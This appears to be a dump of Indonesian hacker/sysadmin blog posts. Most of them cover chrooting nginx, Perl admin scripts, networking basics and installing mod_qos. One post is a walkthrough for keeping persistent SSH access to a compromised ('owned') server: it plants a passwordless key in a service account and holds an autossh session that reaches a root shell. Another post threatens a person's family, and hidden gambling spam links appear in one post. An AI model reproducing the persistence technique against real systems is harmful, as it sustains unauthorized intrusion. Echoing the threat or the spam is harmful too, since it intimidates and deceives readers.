/>[root@godaddy_dedicated ~ chroot]# ls -l /dev/{null,random,urandom}<br />crw-rw-rw- 1 root root 1, 3 Mar 1 16:42 /dev/null<br />crw-rw-rw- 1 root root 1, 8 Mar 1 16:42 /dev/random<br />cr--r--r-- 1 root root 1, 9 Mar 1 16:42 /dev/urandom<br />====<br /><br />melihat tampilan di atas kita siapkan dg mknod:<br />===========<br />[root@godaddy_dedicated ~ chroot]# mknod -m 0666 $D/dev/null c 1 3<br />[root@godaddy_dedicated ~ chroot]# mknod -m 0666 $D/dev/random c 1 8<br />[root@godaddy_dedicated ~ chroot]# mknod -m 0444 $D/dev/urandom c 1 9<br /><br />========<br /><br />cek shared library:<br />=====<br />[root@godaddy_dedicated ~ chroot]# updatedb<br />[root@godaddy_dedicated ~ chroot]# locate nginx | grep bin<br />/root/nginx-1.0.12/objs/src/http/ngx_http_upstream_round_robin.o<br />/root/nginx-1.0.12/src/http/ngx_http_upstream_round_robin.c<br />/root/nginx-1.0.12/src/http/ngx_http_upstream_round_robin.h<br />/usr/local/nginx/sbin<br />/usr/local/nginx/sbin/nginx<br />[root@godaddy_dedicated ~ chroot]# ldd /usr/local/nginx/sbin/nginx<br /> linux-vdso.so.1 => (0x00007fff297fd000)<br /> libpthread.so.0 => /lib64/libpthread.so.0 (0x000000399f200000)<br /> libcrypt.so.1 => /lib64/libcrypt.so.1 (0x00000039a0e00000)<br /> libpcre.so.0 => /lib64/libpcre.so.0 (0x00000039a2600000)<br /> libssl.so.6 => /lib64/libssl.so.6 (0x0000003750400000)<br /> libcrypto.so.6 => /lib64/libcrypto.so.6 (0x00000039a2200000)<br /> libdl.so.2 => /lib64/libdl.so.2 (0x000000399ee00000)<br /> libz.so.1 => /lib64/libz.so.1 (0x000000399fa00000)<br /> libc.so.6 => /lib64/libc.so.6 (0x000000399ea00000)<br /> /lib64/ld-linux-x86-64.so.2 (0x000000399e600000)<br /> libgssapi_krb5.so.2 => /usr/lib64/libgssapi_krb5.so.2 (0x00000039a3a00000)<br /> libkrb5.so.3 => /usr/lib64/libkrb5.so.3 (0x00000039a3600000)<br /> libcom_err.so.2 => /lib64/libcom_err.so.2 (0x00000039a2a00000)<br /> libk5crypto.so.3 => /usr/lib64/libk5crypto.so.3 (0x00000039a3200000)<br /> libkrb5support.so.0 => /usr/lib64/libkrb5support.so.0 (0x00000039a2e00000)<br /> libkeyutils.so.1 => /lib64/libkeyutils.so.1 (0x00000039a1a00000)<br /> libresolv.so.2 => /lib64/libresolv.so.2 (0x00000039a1600000)<br /> libselinux.so.1 => /lib64/libselinux.so.1 (0x000000399fe00000)<br /> libsepol.so.1 => /lib64/libsepol.so.1 (0x00000039a0200000)<br />[root@godaddy_dedicated ~ chroot]# <br /><br />===========<br /><br /><br />========<br />[root@godaddy_dedicated ~ chroot]# cp -fv /etc/{group,prelink.cache,services,adjtime,shells,gshadow,shadow,hosts.deny,localtime,nsswitch.conf,nscd.conf,prelink.conf,protocols,hosts,passwd,ld.so.cache,ld.so.conf,resolv.conf,host.conf} $D/etc <br />=====<br />[root@godaddy_dedicated ~ chroot]# cp -avr /etc/{ld.so.conf.d,prelink.conf.d} $D/etc<br />==========<br /><br /><br />siapkan skrip utk mengkopi shared library di atas:<br />====<br />#!/usr/bin/perl<br />#fetch_nginx_so.pl<br />#made by : ev1lut10n<br />open(PROSES_MYSQL, "ldd /usr/local/nginx/sbin/nginx | grep lib |");<br />while (<PROSES_MYSQL>) <br />{<br />$tampilan_proses .= $_;<br />($nama_lib,$sign,$path_lib,$mem_load) = split;<br />if($path_lib=~/lib/)<br /> {<br /> <br /> system("cp $path_lib /chroot/nginx$path_lib");<br /> <br /> }<br /><br /><br /> }<br />close(PROSES_MYSQL); <br />=====<br /><br />====<br />[root@godaddy_dedicated ~ chroot]# perl fetch_nginx_so.pl <br />cp: cannot create regular file `/chroot/nginx/usr/lib64/libgssapi_krb5.so.2': No such file or directory<br />cp: cannot create regular file `/chroot/nginx/usr/lib64/libkrb5.so.3': No such file or directory<br />cp: cannot create regular file `/chroot/nginx/usr/lib64/libk5crypto.so.3': No such file or directory<br />cp: cannot create regular file `/chroot/nginx/usr/lib64/libkrb5support.so.0': No such file or directory<br />[root@godaddy_dedicated ~ chroot]# locate libgssapi_krb5.so.2<br />[root@godaddy_dedicated ~ chroot]# cd /chroot/nginx/usr/<br />[root@godaddy_dedicated ~ usr]# mkdir lib64<br />[root@godaddy_dedicated ~ chroot]# perl fetch_nginx_so.pl<br />======<br /><br />kopikan ld-linux-x86-64.so.2 secara manual:<br />====<br />[root@godaddy_dedicated ~ chroot]# cp /lib64/ld-linux-x86-64.so.2 /chroot/nginx/lib64/<br />==<br /><br /><br />test apakah nginx sedang berjalan:<br />===[root@godaddy_dedicated ~ chroot]# telnet localhost 80<br />Trying 127.0.0.1...<br />Connected to localhost.secureserver.net (127.0.0.1).<br />Escape character is '^]'.<br />Connection closed by foreign host.<br />[root@godaddy_dedicated ~ chroot]# <br />===========<br /><br />jika terkoneksi matikan:<br />====<br />[root@godaddy_dedicated ~ chroot]# killall -9 nginx<br />====<br /><br /><br />start nginx:<br />=========<br />/usr/sbin/chroot /chroot/nginx /usr/local/nginx/sbin/nginx<br />=========<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-5774656263366089039?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-86187560649521236422012-03-02T09:33:00.001-08:002012-03-02T09:33:14.648-08:00fetch_nginx_so.pl#!/usr/bin/perl<br />#fetch_nginx_so.pl<br />#made by : ev1lut10n<br />open(PROSES_MYSQL, "ldd /usr/local/sbin/nginx | grep lib |"); <br />while (<PROSES_MYSQL>) <br />{ <br />$tampilan_proses .= $_;<br />($nama_lib,$sign,$path_lib,$mem_load) = split;<br />if($path_lib=~/lib/)<br /> {<br /> <br /> system ("cp $path_lib /chroot/nginx$path_lib");<br /> <br /> }<br /><br /><br /> }<br />close(PROSES_MYSQL);<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-8618756064952123642?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-75713229199185844632012-03-01T22:52:00.002-08:002012-03-01T22:52:42.555-08:00heh bocah ingusanmaen2 ma mafia suatu saat bisa celaka, ampe keluarganya bisa satu2 bisa celaka ni anak<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-7571322919918584463?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-71596264347456291882012-02-29T15:13:00.001-08:002012-02-29T15:18:10.187-08:00getnamedautoresolve.pl#/usr/bin/perl -W<br />#made by: ev1lut10n<br />#a simple tool for sysadmin to autoresolve all domains on his server<br />use Socket;<br /><br />sub getdomains()<br />{<br /> system("rm -f domain_lists.txt");<br />open(PROSES_MYSQL, "ls /var/named |");<br />while (<PROSES_MYSQL>)<br /> {<br /> $tampilan_proses = $_;<br /> $tampilan_proses=str_replace('.db','', $tampilan_proses);<br /> $p=length($tampilan_proses);<br /> if($p>5)<br /> {<br /> system("echo '$tampilan_proses'>> domain_lists.txt");<br /> }<br /><br /> }<br />close(PROSES_MYSQL);<br /> <br />}<br /><br />sub autoresolve()<br />{<br /> <br /> open(PASSWORD, "<domain_lists.txt");<br /> my(@lines2) = <PASSWORD>;<br /> @lines2 = sort(@lines2);<br /> my($pass);<br /> foreach $pass (@lines2)<br /> {<br /> print $pass;<br /> chomp($pass);<br /> $p=length($pass);<br /> if($p>5)<br /> {<br /> eval { $address = inet_ntoa(inet_aton($pass)); };<br /> print $pass." resolved as : ".$address."\n";<br /> }<br /> }<br /> close(PASSWORD);<br />}<br /><br /> <br /> <br />sub str_replace {<br />eval<br /> {<br />my $replace_this = shift;<br /> my $with_this = shift;<br /> my $string = shift;<br /> <br /> my $length = length($string);<br /> my $target = length($replace_this);<br /> <br /> for(my $i=0; $i<$length - $target + 1; $i++) {<br /> if(substr($string,$i,$target) eq $replace_this) {<br /> $string = substr($string,0,$i) . $with_this . substr($string,$i+$target);<br /> return $string; #Comment this if you what a global replace<br /> }<br /> }<br /> return $string;<br />}<br />}<br /><br />getdomains();<br /> autoresolve();<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-7159626434745629188?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-61408782564561456262012-02-28T15:40:00.001-08:002012-02-28T15:43:51.430-08:00[the spirit of the dare devil] - martial art is an art of self defenseas my master always teach me to defend my self i will never let my self without any defense. <br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://1.bp.blogspot.com/-3l98IYzGVWQ/T01lg3UeqCI/AAAAAAAAA7E/EsdWCyaxRFY/s1600/evils.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="http://1.bp.blogspot.com/-3l98IYzGVWQ/T01lg3UeqCI/AAAAAAAAA7E/EsdWCyaxRFY/s1600/evils.jpg" width="700" /></a></div><br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-kn6B5VMAvUM/T01lLPRnp_I/AAAAAAAAA64/8iX9-RIXKPk/s1600/nunchaku.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://4.bp.blogspot.com/-kn6B5VMAvUM/T01lLPRnp_I/AAAAAAAAA64/8iX9-RIXKPk/s1600/nunchaku.jpg" width="700" /></a></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-6140878256456145626?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-66420040815478878182012-02-28T02:29:00.000-08:002012-02-28T02:29:04.297-08:00Model 7 layer osi vs Model TCP / IPwritten by: ev1lut10n<br /><br />"Dedicated for : Manusia Biasa Team"<br /><br />Dalam dunia jaringan ada dua model jaringan yang telah melegenda yaitu: "Model 7 Layer OSI" dan "Model TCP/IP"<br /><br />[Model 7 Layer OSI]<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-VVCZ_mmQ3IE/T0yr2Pwd2xI/AAAAAAAAA6g/jJ_prFefun4/s1600/osi.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="http://3.bp.blogspot.com/-VVCZ_mmQ3IE/T0yr2Pwd2xI/AAAAAAAAA6g/jJ_prFefun4/s320/osi.jpg" width="276" /></a></div><br /><br /><br /><br />Layer 7 OSI dikembangkan oleh Organisasi Internasional untuk Standarisasi (ISO), model jaringan ini merupakan sistem yang terdiri dari 7 kue lapis:<br /><br />----------------------------------------------------------------------------------<br />layer 7 : application layer, Lapisan 7: lapisan aplikasi<br />layer ini paling depan berinteraksi dg user untuk mendefinisikan proses user dengan network.<br />contoh tcp / ip protokol pada layer ini: FTP, Gopher, HTTP, SMTP, Telnet , dns , dll<br />-------------------------------------------------------------------------------------<br />layer 6 : presentation layer, Lapisan 6: lapisan presentasi, <br />layer ini merupakan tempatnya data dienkode / dienkrip , misal pada layer inilah dilakukan encode untuk file2 seperti jpg, mpg, dll. misal enkode untuk file teks akan berbeda dengan file mpg<br />contoh : ssl, smb , ncp, mime, tls<br />-------------------------------------------------------------------------------------<br />- layer 5 : session layer, Lapisan 5: lapisan sesi, <br />pada layer inilah tempatnya user session diatur.<br />contoh: pptp, netbios<br />-------------------------------------------------------------------------------------<br />- layer 4 : transport layer, ex : tcp,udp,sctp, dccp - Lapisan 4: transport layer (internetwork connectivity)<br />layer ini mendefinisikan bagaimana sistem atau mekanisme kontrol data / paket <br />contoh: tcp, udp, SCTP (stream control transmission protocol)<br />-------------------------------------------------------------------------------------<br />- layer 3 : network layer,ex : ip , icmp, igmp - Lapisan 3: lapisan jaringan (internetwork connectivity)<br />di layer ini akan ditentukan bagaimana paket akan dirutekan<br />contoh: IP, ICMP, IGMP, ipsec, ospf<br />-------------------------------------------------------------------------------------<br />- layer 2 : data link layer, ex: arp, atm - Lapisan 2: data link layer<br />di layer ini alamat ip akan ditranslasikan menjadi bentuk yang bisa dimengerti oleh physical layer<br />contoh: arp, atm, llc, PPP, SBTV SLIP, PPTP<br />-------------------------------------------------------------------------------------<br />- layer 1 : physical layer. - Lapisan 1: lapisan fisik.<br />Di sinilah bentuk fisik dari perangkat jaringan.<br />misal: kartu jaringan , hub , dll<br /><br />sebenarnya masing 2 layer memiliki fungsi2 lebih dari yang dijelaskan di atas tapi utk mempermudah bahasan hanya akan saya singkat seperti di atas.<br /><br /><br />[Model TCP / IP]<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-8KtTzf1Bi28/T0ysGzAZAAI/AAAAAAAAA6o/d7Wn5l2-__8/s1600/tcpip.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://3.bp.blogspot.com/-8KtTzf1Bi28/T0ysGzAZAAI/AAAAAAAAA6o/d7Wn5l2-__8/s1600/tcpip.jpg" /></a></div><br /><br /><br />Model tcp / ip memiliki 4 lapisan :<br />- Application Layer<br />- Transport Layer<br />- Internet Layer<br />- Network Access Layer<br /><br />[Kapsul Enkapsulasi]<br /><br />proses pengkapsulan dalam model jaringan bisa kita sebut sbg proses penambahan header tiap kali data / paket naik 1 layer.<br /><br />Untuk lebih jelasnya tentang enkapsulasi paket perhatikan gambar dibawah ini:<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-35GJfjXPUt4/T0ysMyP3NWI/AAAAAAAAA6w/qzVoXQ9R6Aw/s1600/kapsul.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="http://2.bp.blogspot.com/-35GJfjXPUt4/T0ysMyP3NWI/AAAAAAAAA6w/qzVoXQ9R6Aw/s1600/kapsul.jpg" width="620" /></a></div><br /><br />misal untuk suatu koneksi tcp:<br />- pada layer 7 dan layer ke 6 merupakan proses konversi data dari user <br />- dari session layer setelah turun 1 layer ke bawah yaitu di transport layer akan ditambahkan header tcp<br />- setelah itu data yang turun 1 layer lagi ke bawah, ketika di berada di network layer dia akan ditambahkan ip header.<br />- turun 1 layer lagi ke bawah tepatnya di data link layer akan ditambahkan header2 berupa :<br />MAC header, LLC Header dan FCS<br />- Turun 1 layer lagi data dikonversi ke dalam bentuk biner menjadi bentuk yang bisa dimengerti oleh physical layer.<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-6642004081547887818?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-5472392641015996642012-02-27T19:57:00.000-08:002012-02-27T19:57:39.935-08:00[Persisten SSH dengan skrip autossh dan memanfaatkan akun tanpa password di server yang diowned][Persisten SSH dengan skrip autossh dan memanfaatkan akun tanpa password di server yang diowned]<br />by: ev1ut10n<br /><br />Dedicated to: "Manusia Biasa Team"<br />thanks to: devilzc0de, antijasakom , manusia biasa team and jasakom and all my bro and sista<br /><br />install skrip autossh untuk mesin debian:<br />=================<br />#apt-get install autossh<br />================<br /><br /><br />jika berhasil maka akan tercipta skrip shell autossh biasanya di /usr/bin/:<br />======<br />#!/bin/sh<br /># little wrapper to choose a random port for autossh, falling back to $fallback_port<br /><br />fallback_port="21021"<br />tcpstat="/proc/net/tcp" <br /><br /># take an hex port and check whether it is in use (i.e. locally bound) in<br /># $tcpstat<br /># unix command semantics: if in use return 0 else return 1<br />port_in_use() {<br /> if egrep -q "^[0-9 ]+: [0-9A-F]{8}:$1" $tcpstat ; then<br /> return 0<br /> else<br /> return 1<br /> fi<br />}<br /> <br />echo "$@" | egrep -q -- '-f?M ?[0-9]+' # backward compatibility, skip guess if -M is passed<br /><br />if [ $? -gt 0 ] && [ -z "$AUTOSSH_PORT" ]; then <br /> portguess=""<br /> if [ -r "/dev/urandom" ] && [ -r "$tcpstat" ]; then<br /> for t in $(seq 1 42); do<br /> # get a random hex<br /> randport=$( od -x -N2 -An /dev/urandom | tr -d ' ' )<br /> <br /> # increase it a little "bit"<br /> randport=$( /usr/bin/printf "%04x" $(( 0x$randport | 0x8000 )) )<br /> randport_1=$( /usr/bin/printf "%04x" $(( 0x$randport + 1 )) )<br /><br /> # check if port is in use, possibile race condition between here<br /> # and the exec <br /> if ! port_in_use $randport && ! port_in_use $randport_1; then<br /> portguess=$(( 0x$randport ))<br /> break <br /> fi<br /> done<br /> fi<br /><br /> if [ -z "$portguess" ]; then<br /> fallback=$( /usr/bin/printf "%04x" $fallback_port )<br /> fallback_1=$( /usr/bin/printf "%04x" $(( 0x$fallback + 1 )) )<br /> if ! port_in_use $fallback && ! port_in_use $fallback_1; then<br /> portguess=$fallback_port<br /> else<br /> echo "unable to find a suitable tunnel port"<br /> exit 1<br /> fi<br /> fi<br /><br /> export AUTOSSH_PORT="$portguess"<br />fi<br />====================<br /><br />selanjutnya siapkan public key ssh ( tanpa password )<br />===================================<br />root@ev1lut10n-Vostro1310:/home/ev1lut10n# ssh-keygen -t rsa<br />Generating public/private rsa key pair.<br />Enter file in which to save the key (/root/.ssh/id_rsa): <br />Enter passphrase (empty for no passphrase): <br />Enter same passphrase again: <br />Your identification has been saved in /root/.ssh/id_rsa.<br />Your public key has been saved in /root/.ssh/id_rsa.pub.<br />The key fingerprint is:<br />90:94:b1:22:20:69:cc:99:fa:dd:68:ab:9e:3b:9b:01 root@ev1lut10n-Vostro1310<br />The key's randomart image is:<br />+--[ RSA 2048]----+<br />|=.o oo |<br />|oB ..o |<br />|o . . + |<br />|. . . . |<br />|E. . o S |<br />| .. + . |<br />| .. . |<br />| .+. |<br />| .B= |<br />+-----------------+<br /><br />========================<br /><br />setelah itu lakukan copy public key tadi ke server yang di0wn3d (di sini port ssh non default yaitud 5669):<br />=======<br />root@ev1lut10n-Vostro1310:/home/ev1lut10n# ssh-copy-id -i /root/.ssh/id_rsa.pub "clamav@hackerbox.org -p 5669"<br />clamav@81.15.18.2's password: <br />Now try logging into the machine, with "ssh 'clamav@hackerbox.org -p 5669'", and check in:<br /><br /> .ssh/authorized_keys<br /><br />to make sure we haven't added extra keys that you weren't expecting.<br />=======<br /><br /><br />selanjutnya kita bisa gunakan autossh:<br />================<br />root@ev1lut10n-Vostro1310:/home/ev1lut10n# autossh -M 3339 clamav@hackerbox.org -p 5669<br />Welcome to motd of hackerbox.org <br />Last login: Tue Feb 28 03:34:49 2012 from 112.215.65.196<br />mv: cannot stat `secure.hm': No such file or directory<br />mv: cannot stat `xferlog.hm': No such file or directory<br />mv: cannot stat `maillog.hm': No such file or directory<br />mv: cannot stat `warn.hm': No such file or directory<br />mv: cannot stat `mail.hm': No such file or directory<br />mv: cannot stat `httpda.hm': No such file or directory<br />mv: cannot stat `httpde.hm': No such file or directory<br />sh-3.2# <br />===============<br /><br />ok mungkin anda bertanya2 mengapa teknik ini digunakan?<br />jawabanya check it out:<br /><br />========================<br />root@ev1lut10n-Vostro1310:~# netstat -a | grep 3339<br />tcp 0 0 localhost.localdom:3339 *:* LISTEN <br />tcp6 0 0 ev1lut10n-Vostro13:3339 [::]:* LISTEN <br />=========================<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-547239264101599664?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-3898356506535965052012-02-27T18:37:00.001-08:002012-02-27T18:43:43.216-08:00Ekstrak rpm di slackware 13.37 dengan cpio[Ekstrak rpm di slackware 13.37 dengan cpio]<br /><br />by: ev1lut10n<br />dedicated to : "Manusia biasa Team"<br />thanks to: devilzc0de, antijasakom , manusia biasa team and jasakom and all my buddy<br /><br />slackware 13.37 merupakan versi slackware favorit penulis. oleh karena itu judul tulisan kali ini berhubungan dengan slackware versi 13.37<br /><br />untuk mengekstrak rpm di slackware 13.37 diperlukan cpio-2.11<br /><br />cpio-2.11-i486-1.txz bisa dicari di pkgs.org<br /><br />lalu install dengan installpkg:<br />======================<br />root@server:~/elf# installpkg cpio-2.11-i486-1.txz<br />======================<br /><br />------------------------------<br />root@server:~/elf# man cpio<br />WARNING: terminal is not fully functional<br />CPIO(1L) CPIO(1L)<br /><br />NAME<br /> cpio - copy files to and from archives<br /><br />SYNOPSIS<br /> cpio {-o|--create} [-0acvABLV] [-C bytes] [-H format] [-M message] [-O [[user@]host:]archive] [-F [[user@]host:]archive]<br /> [--file=[[user@]host:]archive] [--format=format] [--message=message] [--null] [--reset-access-time] [--verbose] [--dot] [--append]<br /> [--block-size=blocks] [--dereference] [--io-size=bytes] [--quiet] [--force-local] [--rsh-command=command] [--help] [--version] <<br /> name-list [> archive]<br /><br />------------------------------<br /><br /><br />untuk mengekstrak file rpm gunakan rpm2cpio. misal:<br /><br />===========<br />root@server:~/elf# rpm2cpio kernel-headers-2.6.18-274.3.1.el5.i386.rpm | cpio -idmv<br />==============<br /><br /><style>#agen_sbobet{color:black}</style><br /><div style="background-color:black"><br /><a id="agen_sbobet" href="http://www.agenbolasbobet7.com/" title="agen bola">agen bola</a><br /><a id="agen_sbobet" href="http://www.bandarbolaeuro2012.com/" title="prediksi euro 2012">agen bola</a><br /><a id="agen_sbobet" href="http://www.agenbolaeuro2012.com/" title="jadwal euro 2012">agen bola sbobet euro 2012</a><br /></div><div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-389835650653596505?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-73930695720936211242012-02-27T03:43:00.003-08:002012-02-27T03:46:52.524-08:00simple perl script for checking httpd connection and auto restarthttpdprocwatcher.pl<br /><br />==============<br />#!/usr/bin/perl -W<br />#gopher://sdf.org/0/users/wisdomc0/code_perl/httpdwatcher.pl <br />#simple max con httpd restarter<br />#made by: ev1lut10n<br />#thanks to: x-hack, danzel, flyff666,p4,smith,superman, raka and all my bro<br />#greets: cakill, fadli and whitehat <br /> sub paksa_fork()<br />{<br /> defined(my $pid = fork);<br /> if ($pid)<br /> {<br /> exit;<br /> }<br /> else<br /> {<br /> for($i=1;$i<3;$i++)<br /> {<br /> defined(my $pid = fork);<br /> if ($pid)<br /> {<br /> exit;<br /> last;<br /> }<br /> }<br /> }<br /> <br />}<br />paksa_fork();<br />for(;;)<br />{<br /> $jum_runner=0;<br /> open(PROSES_MYSQL, "/bin/ps aux |");<br /> while (<PROSES_MYSQL>) <br /> {<br /> $tampilan_proses .= $_;<br /> <br />($uid,$pid,$cpu,$mem,$vsz,$rss,$tty,$stat,$start,$time,$command,$rest) = split;<br /> if($rest=~/httpd/ || $command=~/httpd/)<br /> {<br /> <br /> $jum_runner++;<br /> <br /> } <br /> <br /> }<br /><br /> close(PROSES_MYSQL);<br />if($jum_runner>20)<br />{<br /> system("/etc/init.d/./httpd restart");<br /> <br /> <br /> <br />}<br />else<br />{<br /> <br /> print "\nnormal :$jum_runner \n";<br />}<br /> <br />}<br />===================<div class="blogger-post-footer"><img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2598104819866870995-7393069572093621124?l=myw1sd0m.blogspot.com' alt='' /></div>agen bola sbobetnoreply@blogger.comtag:blogger.com,1999:blog-2598104819866870995.post-45420458392033597422012-02-27T02:44:00.000-08:002012-02-27T02:44:58.479-08:00instalasi mod_qos 10.2 untuk server apache oye nan unyu2dedicated to: "Manusia Biasa Team" <br />thanks: all devilzc0de, jasakom and antijasakom crews and members <br /><br />by: ev1lut10n aka meki meki pikachu<br />"perhaitan !!! path module di tulisan ini : /usr/local/apache/modules kudu musti disesuaikeun dengan instalasssy di server ente gan" <br /><br />mod_qos merupakeun modul apache buat anti dddddoooozzz<br />artikel berikut ini harus dilakukan dengan jari2 yang cepat dan lincah <br /><br />pertama2 <br />download mod_qos dari sourceforge oye:lakukeun weget dengan cepat dan lincah:<br />===================== <br /><br />root@server [~/anti_ddos]# wget http://downloads.sourceforge.net/project/mod-qos/mod_qos-10.2.tar.gz?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fmod-qos%2F&ts=1330338738&use_mirror=nchc<br />[1] 17697<br />[2] 17698<br />--2012-02-27 05:33:39-- http://downloads.sourceforge.net/project/mod-qos/mod_qos-10.2.tar.gz?r=http%3A%2F%2Fsourceforge.net%2Fprojects%2Fmod-qos%2F<br />Resolving downloads.sourceforge.net... root@server [~/anti_ddos]# 216.34.181.59<br />Connecting to downloads.sourceforge.net|216.34.181.59|:80... connected.<br />HTTP request sent, awaiting response... 302 Found<br />Location: http://superb-sea2.dl.sourceforge.net/project/mod-qos/mod_qos-10.2.tar.gz [following]<br />--2012-02-27 05:33:39-- http://superb-sea2.dl.sourceforge.net/project/mod-qos/mod_qos-10.2.tar.gz<br />Resolving superb-sea2.dl.sourceforge.net... 209.160.57.180<br />Connecting to superb-sea2.dl.sourceforge.net|209.160.57.180|:80... connected.<br />HTTP request sent, awaiting response... 200 OK<br />Length: 427678 (418K) [application/x-gzip]<br />Saving to: `mod_qos-10.2.tar.gz'<br /><br />100%[==================================================================================================================>] 427,678 698K/s in 0.6s <br /><br />2012-02-27 05:33:40 (698 KB/s) - `mod_qos-10.2.tar.gz' saved [427678/427678]<br />=======================<br /><br /><br />lakukan uekstrak dengan gagah berani:<br />==============<br />root@server [~/anti_ddos]# tar zxvf mod_qos-10.2.tar.gz<br />mod_qos-10.2/<br />mod_qos-10.2/doc/<br />mod_qos-10.2/doc/qstail.1.html<br />mod_qos-10.2/doc/favicon.ico<br />mod_qos-10.2/doc/CHANGES.txt<br />mod_qos-10.2/doc/mod_qos_s.gif<br />mod_qos-10.2/doc/qsgrep.1.html<br />mod_qos-10.2/doc/mod_qos_seq.gif<br />mod_qos-10.2/doc/qslog.1.html<br />mod_qos-10.2/doc/index.html<br />mod_qos-10.2/doc/qsfilter2_process.gif<br />mod_qos-10.2/doc/qspng.1.html<br />mod_qos-10.2/doc/qsexec.1.html<br />mod_qos-10.2/doc/qsfilter2.1.html<br />mod_qos-10.2/doc/LICENSE.txt<br />mod_qos-10.2/doc/qssign.1.html<br />mod_qos-10.2/doc/qsrotate.1.html<br />mod_qos-10.2/doc/qsgeo.1.html<br />mod_qos-10.2/doc/nevis.gif<br />mod_qos-10.2/tools/<br />mod_qos-10.2/tools/depcomp<br />mod_qos-10.2/tools/Makefile.in<br />mod_qos-10.2/tools/configure.ac<br />mod_qos-10.2/tools/configure<br />mod_qos-10.2/tools/config.h.in<br />mod_qos-10.2/tools/src/<br />mod_qos-10.2/tools/src/Makefile.in<br />mod_qos-10.2/tools/src/qscheck.c<br />mod_qos-10.2/tools/src/qsrotate.c<br />mod_qos-10.2/tools/src/char.h<br />mod_qos-10.2/tools/src/qssign.c<br />mod_qos-10.2/tools/src/qsgeo.c<br />mod_qos-10.2/tools/src/Makefile.am<br />mod_qos-10.2/tools/src/qspng.c<br />mod_qos-10.2/tools/src/qsgrep.c<br />mod_qos-10.2/tools/src/qstail.c<br />mod_qos-10.2/tools/src/qs_util.c<br />mod_qos-10.2/tools/src/qsfilter2.c<br />mod_qos-10.2/tools/src/qs_util.h<br />mod_qos-10.2/tools/src/qslog.c<br />mod_qos-10.2/tools/src/qsexec.c<br />mod_qos-10.2/tools/Makefile.am<br />mod_qos-10.2/tools/install-sh<br />mod_qos-10.2/tools/missing<br />mod_qos-10.2/tools/man1/<br />mod_qos-10.2/tools/man1/qsexec.1<br />mod_qos-10.2/tools/man1/qsfilter2.1<br />mod_qos-10.2/tools/man1/qsgrep.1<br />mod_qos-10.2/tools/man1/qstail.1<br />mod_qos-10.2/tools/man1/qsrotate.1<br />mod_qos-10.2/tools/man1/qslog.1<br />mod_qos-10.2/tools/man1/qsgeo.1<br />mod_qos-10.2/tools/man1/qssign.1<br />mod_qos-10.2/tools/man1/qspng.1<br />mod_qos-10.2/apache2/<br />mod_qos-10.2/apache2/Makefile.in<br />mod_qos-10.2/apache2/mod_qos.c<br />mod_qos-10.2/apache2/config.m4<br />mod_qos-10.2/apache2/mod_qos.h<br />mod_qos-10.2/README.TXT<br />root@server [~/anti_ddos]<br />==============<br /><br />ke direeeekkktorrriii mod_qos-10.2/apache2 oye<br />====<br />root@server [~/anti_ddos]# cd mod_qos-10.2/apache2<br />========<br /><br />cek apxs kita oye:<br />===========<br />root@server [~/anti_ddos/mod_qos-10.2/apache2]# apxs<br />Usage: apxs -g [-S <var>=<val>] -n <modname><br /> apxs -q [-S <var>=<val>] <query> ...<br /> apxs -c [-S <var>=<val>] [-o <dsofile>] [-D <name>[=<value>]]<br /> [-I <incdir>] [-L <libdir>] [-l <libname>] [-Wc,<flags>]<br /> [-Wl,<flags>] [-p] <files> ...<br /> apxs -i [-S <var>=<val>] [-a] [-A] [-n <modname>] <dsofile> ...<br /> apxs -e [-S <var>=<val>] [-a] [-A] [-n <modname>] <dsofile> ...<br />================<br /><br /><br />lalu kompile dg cepat , lincah dan gagah berani:<br />==============<br />root@server [~/anti_ddos/mod_qos-10.2/apache2]# apxs -i -c mod_qos.c<br />/usr/local/apache/build/libtool --silent --mode=compile gcc -prefer-pic -m64 -fPIC -DPIC -DLINUX=2 -D_REENTRANT -D_GNU_SOURCE -m64 -fPIC -DPIC -pthread -I/opt/pcre/include -I/usr/local/apache/include 